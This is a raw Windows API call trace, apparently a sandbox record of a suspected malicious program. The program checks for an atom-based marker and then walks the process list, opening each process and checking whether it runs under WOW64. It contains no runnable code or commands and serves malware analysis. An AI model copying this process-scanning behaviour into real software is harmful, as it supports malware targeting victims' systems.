	[0074.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.351] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.351] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.351] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.352] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetLastError () returned 0x5
	[0074.353] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.353] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.353] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.354] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.354] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.354] CloseHandle (hObject=0x224) returned 1
	[0074.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.354] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.354] CloseHandle (hObject=0x224) returned 1
	[0074.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eae0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.354] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.354] CloseHandle (hObject=0x224) returned 1
	[0074.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0074.386] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.391] CloseHandle (hObject=0x224) returned 1
	[0074.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7289b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.391] CloseHandle (hObject=0x224) returned 1
	[0074.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728858, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.392] CloseHandle (hObject=0x224) returned 1
	[0074.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.392] CloseHandle (hObject=0x224) returned 1
	[0074.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.392] CloseHandle (hObject=0x224) returned 1
	[0074.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.392] CloseHandle (hObject=0x224) returned 1
	[0074.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.392] CloseHandle (hObject=0x224) returned 1
	[0074.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.393] CloseHandle (hObject=0x224) returned 1
	[0074.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.393] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.393] CloseHandle (hObject=0x224) returned 1
	[0074.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.393] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.393] CloseHandle (hObject=0x224) returned 1
	[0074.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.393] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.393] CloseHandle (hObject=0x224) returned 1
	[0074.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.394] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.394] CloseHandle (hObject=0x224) returned 1
	[0074.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.394] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.394] CloseHandle (hObject=0x224) returned 1
	[0074.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.394] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.394] CloseHandle (hObject=0x224) returned 1
	[0074.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.394] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.394] CloseHandle (hObject=0x224) returned 1
	[0074.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.394] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.394] CloseHandle (hObject=0x224) returned 1
	[0074.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.395] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.395] CloseHandle (hObject=0x224) returned 1
	[0074.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.395] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.395] CloseHandle (hObject=0x224) returned 1
	[0074.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.395] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.395] CloseHandle (hObject=0x224) returned 1
	[0074.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
